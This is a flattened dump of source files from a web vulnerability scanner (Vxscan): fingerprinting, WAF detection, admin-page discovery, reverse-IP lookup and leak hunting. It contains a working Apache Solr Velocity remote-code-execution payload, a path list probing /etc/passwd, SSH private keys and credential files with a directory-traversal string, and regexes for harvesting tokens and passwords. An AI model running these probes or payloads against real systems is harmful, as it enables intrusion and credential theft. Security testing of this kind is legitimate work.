iscdn(host): 38 | open_port = ScanPort(url, dbname).pool() 39 | else: 40 | open_port = ['CDN:0'] 41 | 42 | # 调用POC 43 | Vuln(url, host, open_port, apps, dbname).run() 44 | 45 | if isopen: 46 | if CRAWL: 47 | Crawl(url, dbname).pool() 48 | if SCANDIR: 49 | dirscan = DirScan(dbname, apps, url, title) 50 | dirscan.pool() 51 | if data: 52 | web_save(data, dbname) 53 | 54 | 55 | if __name__ == "__main__": 56 | start('http://127.0.0.1') 57 | -------------------------------------------------------------------------------- /script/find_admin.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | # author: al0ne 3 | # https://github.com/al0ne 4 | 5 | import re 6 | 7 | from 
def get_info(url):
    """Probe common admin/login paths under *url*.

    Returns a report string for the first path that looks like a login
    page (HTTP 200 containing login keywords and not a known 404 page,
    or HTTP 403), or None when nothing is found.
    """
    try:
        req = Requests()
        for i in path:
            r = req.get(url + i)
            if r.status_code == 200:
                if re.search(r'admin|login|manager|登陆|管理|后台|type="password"|入口|admin_passwd', r.text, re.S):
                    # verify() rejects pages matching the global 404 fingerprints.
                    if verify(r.text):
                        return 'Admin_Page : ' + url + i
            elif r.status_code == 403:
                # Forbidden often means the panel exists but is access-restricted.
                return 'May be the login page : ' + url + i
    except Exception:
        # Best-effort probe: a network error on one target is not fatal.
        # Narrowed from a bare `except:` which also swallowed SystemExit /
        # KeyboardInterrupt.
        pass
def checkwaf(url):
    """Detect a WAF in front of *url*.

    First inspects a plain request; if that looks clean, sends each attack
    payload in turn and checks the response for WAF fingerprints.

    Returns the WAF name, 'NoWAF', 'CDN IP' for CDN-fronted hosts, or None
    on request failure.
    """
    result = 'NoWAF'
    host = parse_host(url)

    if not iscdn(host):
        return 'CDN IP'

    try:
        req = Requests()
        r = req.get(url)
        result = verify(r.headers, r.text)
        if result == 'NoWAF':
            for i in payload:
                r = req.get(url + i)
                result = verify(r.headers, r.text)
                # Bug fix: the old code returned inside the loop on the
                # *first* payload whether or not a WAF was identified, so
                # payloads 2..n were never sent.  Only stop early on a hit.
                if result != 'NoWAF':
                    break
        # Also return the result detected on the initial request (the old
        # code silently fell through and returned None in that case).
        return result
    except (UnboundLocalError, AttributeError):
        pass
    except Exception as e:
        logging.exception(e)
def send_exp(url):
    """Fire the Velocity template-injection payload against /solr/test/select
    and look for the output of `id` in the response body."""
    exploit = r"/solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"
    try:
        response = req.get(url + exploit)
        if 'uid=' in response.text:
            return 'Apache Solr RCE via Velocity'
    except Exception:
        # Unreachable host / timeout: report nothing.
        pass
def web_info(url):
    """Collect fingerprint information for a web target.

    Gathers GeoIP location, WAF detection, page fingerprint (title, apps,
    server header) and an OS guess, prints them to the console, and returns
    a tuple of (data_dict, apps, title) where data_dict is keyed by host.
    """
    host = parse_host(url)
    ipaddr = parse_ip(host)
    url = url.strip('/')
    address = geoip(ipaddr)
    wafresult = checkwaf(url)
    req = Requests()
    # noinspection PyBroadException
    try:
        r = req.get(url)
        # Decode with the detected charset so non-UTF-8 pages parse correctly.
        coding = chardet.detect(r.content).get('encoding')
        r.encoding = coding
        webinfo = WebPage(r.url, r.text, r.headers).info()
    except Exception as e:
        logging.exception(e)
        webinfo = {}
    if webinfo:
        console('Webinfo', host, 'title: {}\n'.format(webinfo.get('title')))
        console('Webinfo', host, 'Fingerprint: {}\n'.format(webinfo.get('apps')))
        console('Webinfo', host, 'Server: {}\n'.format(webinfo.get('server')))
        console('Webinfo', host, 'WAF: {}\n'.format(wafresult))
    else:
        # No fingerprint: normalise both fields for the stored record.
        webinfo = {}
        wafresult = 'None'
    # Only OS-detect hosts that resolve to a real (non-CDN) IP.
    if iscdn(host):
        osname = osdetect(host)
    else:
        osname = None

    data = {
        host: {
            'WAF': wafresult,
            'Ipaddr': ipaddr,
            'Address': address,
            'Webinfo': webinfo,
            'OS': osname,
        }
    }

    return data, webinfo.get('apps'), webinfo.get('title')
'内容正在加载', '提示:发生错误', '无法加载控制器', '无法加载模块:', '当前页面不存在或已删除', '>错误:操作无法执行', '您访问的网站出错了', 40 | 'URL不符合规定', '没有找到站点', '您所访问的页面不存在', 'File not found', 'Page not found', 'Error code: 404', '>您所提交的请求含有不合法的参数', 41 | '>404 Error', 'Web server is returning an unknown error', 'website not found', '"page404"', '

def start_out(hosts):
    """Print the startup summary: project link, config flags and target count.

    :param hosts: either a list of targets or a single target string.
    """
    # isinstance is the correct check here; `type(hosts) == list` would
    # miss list subclasses.
    if isinstance(hosts, list):
        quantity = str(len(hosts))
    else:
        quantity = '1'
    # (label, value) pairs; value None means the label is a whole line.
    fields = [
        ("[*] https://github.com/al0ne/Vxscan\n", None),
        ("[*] Scanning POC: ", str(POC) + "\n"),
        ("[*] Threads: ", str(THREADS) + "\n"),
        ("[*] Target quantity: ", quantity + "\n"),
        ("[*] Scanning Dir: ", str(SCANDIR) + "\n"),
        ("[*] Ping: ", str(PING) + "\n"),
        ("[*] CHECK_DB: ", str(CHECK_DB) + "\n"),
        ("[*] Socks5 Proxy: ", str(SOCKS5) + "\n\n"),
    ]
    for label, value in fields:
        sys.stdout.write(Bcolors.OKBLUE + label + Bcolors.ENDC)
        if value is not None:
            sys.stdout.write(Bcolors.OKBLUE + value + Bcolors.ENDC)
def inet(net, dbname):
    """Expand a CIDR (or single IP) and scan every live host in it.

    :param net: target network, e.g. '1.1.1.1' or '1.1.1.0/24'
    :param dbname: result database name passed through to start()
    """
    hosts = []
    try:
        result = list(ipaddress.ip_network(net).hosts())
        for ip in result:
            hosts.append(str(ip))
        start_out(hosts)
    except Exception as e:
        # Bug fix: on a bad CIDR the old code printed the error but then
        # carried on and "scanned" a half-built (or empty) host list.
        print("The task could not be carried out. {}".format(str(e)))
        return
    hosts2 = ActiveCheck(hosts).pool()
    for i in hosts2:
        start(i, dbname)
/templata.asp 40 | /as.asp 41 | /11m.asp 42 | /ver.asp 43 | /x.asp 44 | /jianzi.asp 45 | /seo.asp 46 | /sqzr.asp 47 | /zhanpushi.asp 48 | /aa.asp 49 | /aspcms_config.asp 50 | /conn.asp 51 | /contes.asp 52 | /marquee.asp 53 | /version.asp 54 | /siteweb.asp 55 | /1.aspx 56 | /DASA.asp 57 | /tunnel.aspx 58 | /login.aspx 59 | /output.aspx 60 | /xycx.aspx 61 | /messageboard.aspx 62 | /old_certificate.aspx 63 | /checksporterregister.aspx 64 | /sportunit.aspx 65 | /localworkerlist.aspx 66 | /senderlist.aspx 67 | /Login.aspx 68 | /addtargettest.aspx 69 | /approve.aspx 70 | /setregyear.aspx 71 | /userpass.aspx 72 | /addmostlymsn.aspx 73 | /index.aspx 74 | /indexbak.aspx 75 | /workerregister.aspx 76 | /xycx2.aspx 77 | /11.asp 78 | /m_successmodify.aspx 79 | /80sec.asp 80 | /coachnotsubmitlist.aspx 81 | /list.aspx 82 | /schooldetail.aspx 83 | /sportertargettest.aspx 84 | /360.aspx 85 | /Search.aspx 86 | /default.aspx 87 | /localretiresporterlist.aspx 88 | /del.aspx 89 | /pageload.aspx 90 | /questionlist.aspx 91 | /rycx_new.aspx 92 | /umpireregister.aspx 93 | /111.aspx 94 | /barcode.aspx 95 | /content_index.aspx 96 | /usermodify.aspx 97 | /MessageBoardList.aspx 98 | /about.asp 99 | /default_en.asp 100 | /helloworld.aspx 101 | /messageboarddetail.aspx 102 | /phonebarcode.aspx 103 | /search.asp 104 | /123.aspx 105 | /ProductDisplay.aspx 106 | /guiyang.aspx 107 | /help3.asp 108 | /ic02.asp 109 | /jj.aspx 110 | /l.asp 111 | /newview.asp 112 | /opinionmore.aspx 113 | /per_dataResult.aspx 114 | /reDuh.aspx 115 | /report_rekapitulasi.aspx 116 | /search.aspx 117 | /test.aspx 118 | /testtestfuck.aspx 119 | /themedetails.aspx 120 | /wan.aspx 121 | /yijuhua.aspx -------------------------------------------------------------------------------- /plugins/PassiveReconnaissance/reverse_domain.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | # author: al0ne 3 | # https://github.com/al0ne 4 | 5 | import json 6 | import re 7 | import sys 
def reverse_domain(host):
    """Reverse-IP lookup: list other domains hosted on the same IP.

    Queries yougetsignal.com first and falls back to hackertarget.com on
    failure.  Prints findings via console() and returns the list of
    domains, capped at 20 entries.  Returns None for CDN-fronted hosts.
    """
    # 查询旁站
    sys.stdout.write(Bcolors.RED + "\nReverse IP Domain Check:\n" + Bcolors.ENDC)
    if iscdn(host):
        result = []
        data = {"remoteAddress": "{0}".format(host), "key": ""}
        header = get_ua()
        try:
            r = requests.post('https://domains.yougetsignal.com/domains.php',
                              headers=header,
                              data=data,
                              timeout=5,
                              verify=False)
            text = json.loads(r.text)
            domain = tldextract.extract(host)
            for i in text.get('domainArray'):
                url = i[0]
                if url != host:
                    # Keep names on the same registered domain, and raw IPs.
                    if tldextract.extract(url).domain == domain.domain:
                        result.append(url)
                    elif re.search(r'\d+\.\d+\.\d+\.\d+', url):
                        result.append(url)
        except Exception:
            # Primary service failed; fall back to hackertarget.
            # (Narrowed from bare `except:` which also caught SystemExit.)
            try:
                r = requests.get('http://api.hackertarget.com/reverseiplookup/?q={}'.format(host),
                                 headers=get_ua(),
                                 timeout=4,
                                 verify=False)
                if '<html>' not in r.text and 'No DNS A records found for' not in r.text:
                    text = r.text
                    for _ in text.split('\n'):
                        if _:
                            result.append(_)
                else:
                    result = []
            except Exception:
                pass
        if len(result) < 20:
            if result:
                for i in result:
                    console('reverse_domain', host, i + '\n')
            else:
                console('reverse_domain', host, 'None\n')
            return result
        else:
            console('reverse_domain', host, 'The maximum number of domain names exceeded (20)\n')
            # sys.stdout.write(Bcolors.OKGREEN + 'The maximum number of domain names exceeded (20)\n' + Bcolors.ENDC)
            return ['The maximum number of domain names exceeded (20)']
def diff(urls):
    """De-duplicate pseudo-static URLs by query-parameter name.

    For URLs like https://host/path?page=1 keep only one URL per
    (netloc, path, first-parameter-name) combination, so ?page=1 and
    ?page=2 collapse to one entry while ?id=3 is kept.

    :param urls: iterable of URL strings that contain a '=' query string
    :return: list with parameter-name duplicates removed
    """
    parms = []
    host = []
    result = []
    path = []
    # url = 'https://www.xxx.com/?page=1
    # 伪静态去重 通过urlparse取出来page=1,根据逗号拆分取出来k=page,然后保存不重复的k
    for i in urls:
        url = parse.urlparse(i)
        # NOTE: removed leftover debug `print(url)` that polluted stdout
        # on every URL processed.
        k, v, *_ = url.query.split('=')
        if url.netloc in host:
            if url.path in path:
                if k not in parms:
                    parms.append(k)
                    result.append(i)
            else:
                result.append(i)
                path.append(url.path)
        else:
            host.append(url.netloc)
            result.append(i)
            path.append(url.path)
            parms.append(k)

    return result
判断url是不是伪静态,伪静态与普通的去重方法不一样 75 | if re.search(r'/\?\d+=', i): 76 | furls.append(i) 77 | else: 78 | # 通过urlparse 对url进行去参去重,相同的丢弃 79 | url = parse.urlparse(i) 80 | if url.netloc + url.path not in host: 81 | host.append(url.netloc + url.path) 82 | _.append(i) 83 | _.extend(diff(furls)) 84 | return _ -------------------------------------------------------------------------------- /report/en.js: -------------------------------------------------------------------------------- 1 | (function (global, factory) { 2 | if (typeof define === "function" && define.amd) { 3 | define('element/locale/en', ['module', 'exports'], factory); 4 | } else if (typeof exports !== "undefined") { 5 | factory(module, exports); 6 | } else { 7 | var mod = { 8 | exports: {} 9 | }; 10 | factory(mod, mod.exports); 11 | global.ELEMENT.lang = global.ELEMENT.lang || {}; 12 | global.ELEMENT.lang.en = mod.exports; 13 | } 14 | })(this, function (module, exports) { 15 | 'use strict'; 16 | 17 | exports.__esModule = true; 18 | exports.default = { 19 | el: { 20 | colorpicker: { 21 | confirm: 'OK', 22 | clear: 'Clear' 23 | }, 24 | datepicker: { 25 | now: 'Now', 26 | today: 'Today', 27 | cancel: 'Cancel', 28 | clear: 'Clear', 29 | confirm: 'OK', 30 | selectDate: 'Select date', 31 | selectTime: 'Select time', 32 | startDate: 'Start Date', 33 | startTime: 'Start Time', 34 | endDate: 'End Date', 35 | endTime: 'End Time', 36 | prevYear: 'Previous Year', 37 | nextYear: 'Next Year', 38 | prevMonth: 'Previous Month', 39 | nextMonth: 'Next Month', 40 | year: '', 41 | month1: 'January', 42 | month2: 'February', 43 | month3: 'March', 44 | month4: 'April', 45 | month5: 'May', 46 | month6: 'June', 47 | month7: 'July', 48 | month8: 'August', 49 | month9: 'September', 50 | month10: 'October', 51 | month11: 'November', 52 | month12: 'December', 53 | // week: 'week', 54 | weeks: { 55 | sun: 'Sun', 56 | mon: 'Mon', 57 | tue: 'Tue', 58 | wed: 'Wed', 59 | thu: 'Thu', 60 | fri: 'Fri', 61 | sat: 'Sat' 62 | }, 63 | months: { 64 | 
def verify(text):
    """Validate a set of regex matches from a JS file.

    Returns False (discard the whole match set) as soon as any matched
    string looks like common noise: Google/recaptcha assets, image file
    names, zero-padded IPs or version-like numbers; True otherwise.

    Bug fix: the previous condition was inverted (`if not re.search(...)`),
    which kept ONLY the junk matches and threw away every real leak.
    """
    # 验证匹配结果
    result = True
    for i in text:
        if re.search(r'^0\d\.\d+\.\d+\.\d+|google|recaptcha|gtm\.js|png$|gif$|jpg$|\b\d+\.\d+\.0\.0', i):
            result = False
            break
    return result
r'\b(?:secret|secret_key|token|secret_token|auth_token|access_token|username|password|aws_access_key_id|aws_secret_access_key|secretkey|authtoken|accesstoken|access-token|authkey|client_secret|bucket|extr|HEROKU_API_KEY|SF_USERNAME|PT_TOKEN|id_dsa|clientsecret|client-secret|encryption-key|pass|encryption_key|encryptionkey|secretkey|secret-key|bearer|JEKYLL_GITHUB_TOKEN|HOMEBREW_GITHUB_API_TOKEN|api_key|api_secret_key|api-key|private_key|client_key|client_id|sshkey|ssh_key|ssh-key|privatekey|DB_USERNAME|oauth_token|irc_pass|dbpasswd|xoxa-2|xoxrprivate-key|private_key|consumer_key|consumer_secret|access_token_secret|SLACK_BOT_TOKEN|slack_api_token|api_token|ConsumerKey|ConsumerSecret|SESSION_TOKEN|session_key|session_secret|slack_token|slack_secret_token|bot_access_token|passwd|api|eid|sid|qid|api_key|apikey|userid|user_id|user-id|uid|private|BDUSS|stoken|imei|imsi|nickname|appid|uname)["\s]*(?::|=|=:|=>)["\s]*[a-z0-9A-Z]{8,64}', 52 | # 匹配 53 | r'(?:[^a-fA-F\d]|\b)(?:[a-fA-F\d]{32})(?:[^a-fA-F\d]|\b)', 54 | # 匹配 "/task/router" 这种路径 55 | r'"(/\w{3,}/\w{3,})"', 56 | # 匹配IP地址 57 | r'\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b', 58 | # 匹配云泄露 59 | r'[\w]+\.cloudfront\.net', 60 | r'[\w\-.]+\.appspot\.com', 61 | r'[\w\-.]*s3[\w\-.]*\.?amazonaws\.com\/?[\w\-.]*', 62 | r'([\w\-.]*\.?digitaloceanspaces\.com\/?[\w\-.]*)', 63 | r'(storage\.cloud\.google\.com\/[\w\-.]+)', 64 | r'([\w\-.]*\.?storage.googleapis.com\/?[\w\-.]*)', 65 | # 匹配手机号 66 | r'(?:139|138|137|136|135|134|147|150|151|152|157|158|159|178|182|183|184|187|188|198|130|131|132|155|156|166|185|186|145|175|176|133|153|177|173|180|181|189|199|170|171)[0-9]{8}' 67 | # 匹配域名 68 | r'((?:[a-zA-Z0-9](?:[a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?\.)+(?:biz|cc|club|cn|com|co|edu|fun|group|info|ink|kim|link|live|ltd|mobi|net|online|org|pro|pub|red|ren|shop|site|store|tech|top|tv|vip|wang|wiki|work|xin|xyz|me))' 69 | ) 70 | for _ in regex: 71 | text = re.findall(_, r.text[:100000], re.M | 
re.I) 72 | if text is not None and verify(text): 73 | text = list(map(lambda x: url + ' Leaks: ' + x, text)) 74 | self.result.extend(text) 75 | 76 | 77 | if __name__ == "__main__": 78 | start_time = time.time() 79 | urls1 = ['https://www.baidu.com'] 80 | jsparse = JsLeaks().pool(urls1) 81 | print(jsparse) 82 | end_time = time.time() 83 | print('\nrunning {0:.3f} seconds...'.format(end_time - start_time)) 84 | -------------------------------------------------------------------------------- /data/path/other.txt: -------------------------------------------------------------------------------- 1 | /WEB-INF/classes/dataBase.properties 2 | /WEB-INF/conf/database_config.properties 3 | /.ssh/id_rsa.pub 4 | /resin-doc 5 | /WEB-INF/conf/activemq.xml 6 | /js/browsers.js 7 | /ClientAccessPolicy.xml 8 | /Public/js/weibologin.js 9 | /package.rar 10 | /package.tgz 11 | /WEB-INF/classes/data.properties 12 | /WEB-INF/spring.xml 13 | /src.tar.gz 14 | /invoker/JMXInvokerServlet 15 | /crossdomain.xml 16 | /.ssh/id_dsa 17 | /resource/js/cj.js 18 | /setup.sh 19 | /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/profile 20 | /old.tar.bz2 21 | /application/configs/application.ini 22 | /WEB-INF/dwr.xml 23 | /htpasswd.bak 24 | /axis2-web/css/axis-style.css 25 | /WEB-INF/classes/conf/jdbc.properties 26 | /backup.sql.gz 27 | /index.tar.tz 28 | /readme.md 29 | /.git/index 30 | /.idea/workspace.xml 31 | /database.yml 32 | /bakup.hp 33 | /WEB-INF/struts-front-config.xml 34 | /.htpasswd 35 | /WEB-INF/config/data/dataSource.xml 36 | /WEB-INF/classes/data.xml 37 | /proc/meminfo 38 | /ying.PhP 39 | /httpd.conf 40 | /app.cfg 41 | /WEB-INF/config/dbconfig 42 | /data.ini 43 | /.ssh/known_hosts 44 | /sitemap.xml 45 | /.idea/scopes/scope_settings.xml 46 | /fvzrx13171.jpg 47 | /WEB-INF/classes/conf/spring/applicationContext-datasource.xml 48 | /htaccess.bak 49 | /build.tar.gz 50 | /etc/profile 51 | /WEB-INF/classes/applicationContext.xml 52 | /resin-admin 53 | /crazy7.jpg 54 | /.bash_logout 
55 | /.bashrc 56 | /a.out 57 | /javax.faces.resource...%2fWEB-INF/web.xml.jsf 58 | /WEB-INF/classes/application.properties 59 | /config.ini 60 | /local.conf 61 | /jbossmq-httpil/HTTPServerILServlet 62 | /.idea/modules.xml 63 | /config.json 64 | /web.config 65 | /WEB-INF/web.xml.bak 66 | /code.tar.gz 67 | /jenkins/static/f3a41d2f/css/style.css 68 | /.git/HEAD 69 | /data.conf 70 | /web-console/Invoker 71 | /.gitignore 72 | /o.tar.gz 73 | /configuration.ini 74 | /readme.html 75 | /server.xml 76 | /WEB-INF/classes/hibernate.cfg.xml 77 | /conf.ini 78 | /userAction.struts 79 | /jmx-console/HtmlAdaptor 80 | /wp-config.bak 81 | /WEB-INF/struts/struts-config.xml 82 | /manage/html 83 | /package.zip 84 | /WEB-INF/classes/security.properties 85 | /.svn/wc.data 86 | /console/css/login.css 87 | /jmx-console 88 | /dump.sql.gz 89 | /static/f3a41d2f/css/style.css 90 | /admin-console 91 | /.idea/.name 92 | /.DS_Store 93 | /upload.sh 94 | /WEB-INF/classes/rabbitmq.xml 95 | /database.sql.gz 96 | /WEB-INF/classes/config/applicationContext.xml 97 | /crazy3.jpg 98 | /WEB-INF/database.properties 99 | /manager/html 100 | /WEB-INF/classes/struts.xml 101 | /.vimrc 102 | /CVS/Root 103 | /settings.ini 104 | /tools.tar.gz 105 | /install.sh 106 | /.history 107 | /WEB-INF/classes/spring.xml 108 | /package.tar.bz2 109 | /INSTALL.TXT 110 | /.git/config 111 | /examples/servlets/servlet/SessionExample 112 | /conf/config.ini 113 | /.bzr 114 | /conf.tar.gz 115 | /fckeditor/_samples/default.html 116 | /deploy.tar.gz 117 | /ueditor/ueditor.config.js 118 | /WEB-INF/config.xml 119 | /wp-admin 120 | /struts/webconsole.html 121 | /.htaccess 122 | /package.tar.gz 123 | /invoker/EJBInvokerServlet 124 | /imbsb17357.jpg 125 | /README.md 126 | /failure.json 127 | /axis2-admin 128 | /config.inc 129 | /media/system/js/caption.js 130 | /rsync.sh 131 | /LoginHandler.ashx 132 | /WEB-INF/struts-config.xml 133 | /.rediscli_history 134 | /config/database.yml 135 | /rjrzk86964.jpg 136 | 
/WEB-INF/spring-cfg/applicationContext.xml 137 | /mt-upgrade.cgi 138 | /data.sqlite 139 | /.mysql_history 140 | /pool.sh 141 | /test2.html 142 | /WEB-INF/classes/struts_manager.xml 143 | /crazy6.jpg 144 | /.bash_history 145 | /invoker/readonly 146 | /WEB-INF/applicationContext-slave.xml 147 | /jenkins/script 148 | /.ssh/id_rsa 149 | /xianf.ASP 150 | /WEB-INF/log4j.properties 151 | /WEB-INF/web.xml 152 | /etc/passwd 153 | /.ssh/authorized_keys 154 | /favicon.ico 155 | /help/io_login.html 156 | /WEB-INF/applicationContext.xml 157 | /.ssh/id_dsa.pub 158 | /WEB-INF/web.properties 159 | /CVS/Entries 160 | /app.config 161 | /server-status 162 | /config/config.ini 163 | /.bash_profile 164 | /app.ini 165 | /sftp-config.json 166 | /deploy.sh 167 | /sync.sh 168 | /static/js/admincp.js 169 | /.svn/entries 170 | /conf/conf.zip 171 | /wp-config.inc 172 | /data.sql.gz 173 | /66.ashx 174 | /index.cgi.bak 175 | /.hg 176 | /.htpasswd.bak 177 | /application.ini 178 | /WEB-INF/classes/jdbc.properties 179 | /output.tar.gz 180 | /proxy.pac 181 | /WEB-INF/classes/conf/datasource.xml 182 | /backup.sh 183 | /server.cfg 184 | /configs/application.ini 185 | /server-info/struts/webconsole.html 186 | /pangca.PHp 187 | /x.tar.gz 188 | /nohup.out 189 | /index.htm 190 | /change_lan.php?LanID=../../../../../../../../../etc/passwd%00 -------------------------------------------------------------------------------- /analyzer.py: -------------------------------------------------------------------------------- 1 | import ipaddress 2 | import os 3 | import re 4 | from collections import Counter 5 | 6 | from lib.bcolors import Bcolors 7 | from lib.sqldb import Sqldb 8 | 9 | dbname = 'result' 10 | 11 | if os.path.exists('output.log'): 12 | os.remove('output.log') 13 | 14 | 15 | def get_top(result): 16 | out = [] 17 | count = Counter(result) 18 | L = sorted(count.items(), key=lambda item: item[1], reverse=True) 19 | L = L[:10] 20 | for i in L: 21 | app, appnum = i 22 | 
def get_cidr(iplist):
    """Print the ten most common /24 networks among *iplist*.

    Each IPv4 address is mapped to its /24 network by zeroing the last
    octet; a network's count is the number of entries (duplicates included)
    that fall inside it. Output format per line: "<cidr> <count>".

    Raises ValueError (from ipaddress) on malformed addresses, matching the
    previous behaviour.
    """
    # Single pass instead of the former O(n^2) containment scan: the /24 an
    # address belongs to is fully determined by its first three octets, so
    # counting the derived networks directly yields the same totals.
    counts = Counter(
        str(ipaddress.ip_network(re.sub(r'\d+$', '0/24', ip))) for ip in iplist
    )
    # most_common(10) sorts by count descending, stable on first occurrence —
    # the same ordering get_top() produced.
    for cidr, num in counts.most_common(10):
        print(cidr, num)
def gener():
    """Generate a plain-text report of all scan results.

    Reads the webinfo, ports, urls and vuln tables from the result database
    and mirrors every line to stdout and to output.log (appended, UTF-8).

    Fixes over the previous version: the log file is closed via a context
    manager; the url line used '{}t{}' (missing backslash) instead of a tab;
    the local name `os` shadowed the imported os module; and the ports loop
    clobbered the outer `domain`/`server` variables used by later queries.
    """
    # NOTE(review): the f-string SQL below interpolates values read back from
    # our own database; still, parameterized queries would be safer — confirm
    # Sqldb.query supports placeholders before changing.
    with open('output.log', 'a', encoding='utf-8') as f:
        webinfo = Sqldb(dbname).query('select domain,ipaddr,title,server,apps,waf,os from webinfo')
        for row in webinfo:
            domain, ipaddr, title, server, apps, waf, os_name = row
            banner = '\n' + '*' * 40 + ' ' + domain + ' ' + '*' * 40
            print(banner)
            f.write(banner + '\n')
            summary = '{}|{}|{}|{}|{}'.format(domain, ipaddr, title, server, waf)
            print(summary)
            f.write(summary + '\n')
            print('指纹:' + str(apps))
            f.write('指纹:' + str(apps) + '\n')
            print('操作系统:' + str(os_name))
            f.write('操作系统:' + str(os_name) + '\n')
            ports = Sqldb(dbname).query(f"select ipaddr,service,port from ports where ipaddr = '{domain}'")
            # Distinct loop names: the old code reused domain/server here and the
            # urls/vulns queries below then ran against the clobbered values.
            for p_addr, p_service, p_port in ports:
                print(p_addr, p_service, p_port)
                f.write('{}\t{}\t{}'.format(p_addr, p_service, p_port) + '\n')
            urls = Sqldb(dbname).query(f"select title,url,contype,rsp_len,rsp_code from urls where domain = '{domain}'")
            for u_title, u_url, u_contype, u_len, u_code in urls:
                # bug fix: fourth separator was the literal 't', not a tab
                line = '{}\t{}\t{}\t{}\t{}'.format(u_title, u_url, u_contype, u_len, u_code)
                print(line)
                f.write(line + '\n')
            vulns = Sqldb(dbname).query(f"select vuln from vuln where domain = '{ipaddr}'")
            for vuln in vulns:
                print(vuln[0])
                f.write(vuln[0] + '\n')
OpenSSL.SSL.WantReadError, 62 | urllib3.exceptions.DecodeError, requests.exceptions.ContentDecodingError): 63 | pass 64 | except Exception as e: 65 | logging.exception(e) 66 | 67 | def get(self, url): 68 | url = verify(url) 69 | try: 70 | r = self.session.get(url, timeout=self.timeout, headers=self.headers, verify=False, allow_redirects=False) 71 | return r 72 | except (requests.exceptions.ConnectTimeout, requests.exceptions.ReadTimeout, requests.exceptions.Timeout, 73 | requests.exceptions.SSLError, requests.exceptions.ConnectionError, ssl.SSLError, AttributeError, 74 | ConnectionRefusedError, socket.timeout, urllib3.exceptions.ReadTimeoutError, OpenSSL.SSL.WantReadError, 75 | urllib3.exceptions.DecodeError, requests.exceptions.ContentDecodingError): 76 | pass 77 | except Exception as e: 78 | logging.exception(e) 79 | 80 | def post(self, url, data): 81 | url = verify(url) 82 | try: 83 | r = self.session.post(url, 84 | data=data, 85 | timeout=self.timeout, 86 | headers=self.headers, 87 | verify=False, 88 | allow_redirects=False) 89 | return r 90 | except (requests.exceptions.ConnectTimeout, requests.exceptions.ReadTimeout, requests.exceptions.Timeout, 91 | requests.exceptions.SSLError, requests.exceptions.ConnectionError, ssl.SSLError, AttributeError, 92 | ConnectionRefusedError, socket.timeout, urllib3.exceptions.ReadTimeoutError, OpenSSL.SSL.WantReadError, 93 | urllib3.exceptions.DecodeError, requests.exceptions.ContentDecodingError): 94 | pass 95 | except Exception as e: 96 | logging.exception(e) 97 | 98 | def request(self, url, method, data=None, headers=None): 99 | url = verify(url) 100 | try: 101 | if method == 'get': 102 | r = self.session.get(url, timeout=self.timeout, headers=headers, verify=False, allow_redirects=True) 103 | return r 104 | else: 105 | r = self.session.post(url, 106 | data=data, 107 | timeout=self.timeout, 108 | headers=headers, 109 | verify=False, 110 | allow_redirects=False) 111 | return r 112 | except 
    def check(self, url):
        """Filter one target and, when it is alive, record it in self.out.

        Rejects the host (returning False) when the country/IP whitelist or
        blocked-TLD filters match, when DNS resolution hits a sinkhole-like
        address, or when the ping/nmap liveness probe fails. On success the
        URL is appended to self.out and the method returns None.
        """
        loc = parse.urlparse(url)
        # urlparse('example.com') puts a bare hostname in .path, not .netloc
        if getattr(loc, 'netloc'):
            host = loc.netloc
        else:
            host = loc.path

        # Verify the target's country (skip hosts in disallowed countries)
        if VERIFY_COUNTRY:
            if verify_country(host):
                console('Disable', host, "Disable Country\n")
                return False

        # Literal IPv4 targets must pass the whitelist check
        if re.search(r'\d+\.\d+\.\d+\.\d+', host):
            if not WhiteIP().checkip(host):
                console('Disable', host, "China IP\n")
                return False

        # Never scan these TLD patterns (government/education/military etc.)
        if re.search(r'\.org\.cn|\.com\.cn|\.cn|gov\.cn|edu\.cn|\.mil|\.aero|\.int|\.go\.\w+$|\.ac\.\w+$', host):
            console('Disable', host, "Do not scan this domain\n")
            return False

        try:
            # Decide whether this is an IP or a domain; a domain needs its DNS
            # resolution checked first
            if not re.search(r'\d+\.\d+\.\d+\.\d+', host):
                # Verify DNS liveness, and the resolved A record must not be a
                # special address (public DNS resolver IPs, loopback, 0.0.0.0)
                console('Dnscheck', host, 'query dns a records\n')
                resolver = dns.resolver.Resolver()
                resolver.nameservers = ['1.1.1.1', '8.8.8.8']
                a = resolver.query(host, 'A')
                for i in a.response.answer:
                    for j in i.items:
                        if hasattr(j, 'address'):
                            # if re.search(r'\d+\.\d+\.\d+\.\d+', j.address):
                            #     if not WhiteIP().checkip(j.address):
                            #         console('Disable', j.address, "China IP\n")
                            #         return False
                            if re.search(r'1\.1\.1\.1|8\.8\.8\.8|127\.0\.0\.1|114\.114\.114\.114|0\.0\.0\.0',
                                         j.address):
                                return False
            if PING:
                try:
                    # Windows uses ping to test liveness; elsewhere nmap is used.
                    # nmap's host discovery pings and then probes port 80, so
                    # ping-blocking hosts are not missed.
                    if platform.system() == 'Windows':
                        console('PING', host, 'Ping scan\n')
                        subprocess.check_output(['ping', '-n', '2', '-w', '1', host])
                        self.out.append(url)
                    else:
                        console('PING', host, 'Nmap Ping scan\n')
                        nm = nmap.PortScanner()
                        result = nm.scan(hosts=host, arguments='-sP -n')
                        for k, v in result.get('scan').items():
                            if not v.get('status').get('state') == 'up':
                                console('PING', host, "is not alive\n")
                                return False
                            else:
                                self.out.append(url)

                except (AttributeError, subprocess.CalledProcessError, xml.etree.ElementTree.ParseError,
                        nmap.nmap.PortScannerError):
                    console('PING', host, "is not alive\n")
                    return False
                except Exception as e:
                    logging.exception(e)
                    return False

            else:
                # Liveness probing disabled: accept the host as-is
                self.out.append(url)
        except (dns.resolver.NoAnswer, dns.resolver.NXDOMAIN, dns.resolver.NoNameservers):
            console('DnsCheck', host, "No A record\n")
        except dns.exception.Timeout:
